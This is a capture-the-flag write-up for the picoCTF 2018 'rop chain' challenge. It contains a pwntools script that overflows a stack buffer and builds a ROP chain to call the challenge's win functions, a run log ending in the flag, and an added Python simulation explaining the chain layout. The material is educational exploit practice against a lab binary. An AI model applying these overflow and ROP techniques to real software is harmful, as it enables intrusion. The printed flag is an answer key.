The easy way is to use the ROP module from pwntools.

**xpwn.py**
```py
#! /usr/bin/env python
from pwn import process, p32, u32, context, log
from pwn import ELF, ROP
context.clear(arch='i386', os='linux')

def main():
    elf_name = '/problems/rop-chain_2_d25a17cfdcfdaa45844798dd74d03a47/rop'
    elf = ELF(elf_name)
    # distance from the start of the buffer to the saved return address
    offset_buf_to_eip = 0x18 + 4

    p = process(elf_name)

    # ROP resolves the symbols from the ELF and lays out the arguments
    rop_chain = ROP(elf)
    rop_chain.win_function1()
    rop_chain.win_function2(0xBAAAAAAD)
    rop_chain.flag(0xDEADBAAD)

    log.info(rop_chain.dump())

    # bytes literals and chain() keep the script working on Python 2 and 3
    payload = b'A' * offset_buf_to_eip
    payload += rop_chain.chain()
    # the payload is sent as one line, so it must not contain a newline
    assert b'\n' not in payload
    p.sendlineafter(b'input> ', payload)

    print(p.recv(4096))

if __name__ == "__main__":
    main()
```

Run **xpwn.py** on the pico shell server to finish the task:

```sh
zzzz@pico-2018-shell-2:~/pico18/pwn/rop$ py xpwn.py
[*] '/problems/rop-chain_2_d25a17cfdcfdaa45844798dd74d03a47/rop'
    Arch: i386-32-little
    RELRO: Partial RELRO
    Stack: No canary found
    NX: NX enabled
    PIE: No PIE (0x8048000)
[+] Starting local process '/problems/rop-chain_2_d25a17cfdcfdaa45844798dd74d03a47/rop': pid 1838022
[*] Loaded cached gadgets for '/problems/rop-chain_2_d25a17cfdcfdaa45844798dd74d03a47/rop'
[*] 0x0000: 0x80485cb win_function1()
    0x0004: 0x80485d8 win_function2(0xbaaaaaad)
    0x0008: 0x804840d <adjust @0x10> pop ebx; ret
    0x000c: 0xbaaaaaad arg0
    0x0010: 0x804862b flag(0xdeadbaad)
    0x0014: 'faaa' <return address>
    0x0018: 0xdeadbaad arg0
picoCTF{rOp_aInT_5o_h4Rd_R1gHt_9853cfde}
```
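
To read the `rop_chain.dump()` output above, this added example (not part of the original writeup) walks the seven dumped words the way an i386 cdecl `ret` consumes them and reports which function sees which argument. `trace_calls`, `DUMPED` and `NO_ADJUST` are names made up here; the argument counts are assumed from the calls in xpwn.py, and `NO_ADJUST` is a constructed counter-example that drops the `pop ebx; ret` slot.

```python
import struct

# Words copied from the rop_chain.dump() output above (little-endian i386).
WIN1, WIN2, FLAG = 0x80485cb, 0x80485d8, 0x804862b
POP_RET = 0x804840d                       # "pop ebx; ret" adjust gadget
FILLER = struct.unpack("<I", b"faaa")[0]  # pwntools filler return address

# Name and argument count, assumed from the calls made in xpwn.py.
FUNCS = {WIN1: ("win_function1", 0), WIN2: ("win_function2", 1), FLAG: ("flag", 1)}

DUMPED = [WIN1, WIN2, POP_RET, 0xBAAAAAAD, FLAG, FILLER, 0xDEADBAAD]
# Constructed counter-example: same layout with the adjust gadget left out.
NO_ADJUST = [WIN1, WIN2, 0xBAAAAAAD, FLAG, FILLER, 0xDEADBAAD]


def trace_calls(words):
    """Walk a chain the way i386 cdecl `ret` does; return [(name, args), ...]."""
    stack = struct.pack("<%dI" % len(words), *words)

    def word(off):
        return struct.unpack_from("<I", stack, off)[0]

    calls, esp = [], 0
    while esp + 4 <= len(stack):
        eip, esp = word(esp), esp + 4     # ret: pop the next address into eip
        if eip == POP_RET:
            esp += 4                      # pop ebx discards one stale argument
        elif eip in FUNCS:
            name, argc = FUNCS[eip]
            if esp + 4 * (argc + 1) > len(stack):
                break                     # chain too short to hold the args
            # At entry [esp] is the callee's return address; args start at esp+4.
            args = [word(esp + 4 * (i + 1)) for i in range(argc)]
            calls.append((name, args))
        else:
            break                         # control leaves the known code
    return calls


if __name__ == "__main__":
    for label, chain in (("dumped", DUMPED), ("no adjust", NO_ADJUST)):
        for name, args in trace_calls(chain):
            print(label, name, [hex(a) for a in args])
```

With the gadget removed, `win_function2` reads the address of `flag` as its argument and the walk stops at `0xbaaaaaad`, which is why pwntools places the `<adjust @0x10>` slot between the two calls.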

Original writeup (https://github.com/lzutao/ctf-writeups/tree/master/picoCTF/2018/pwn/rop_chain).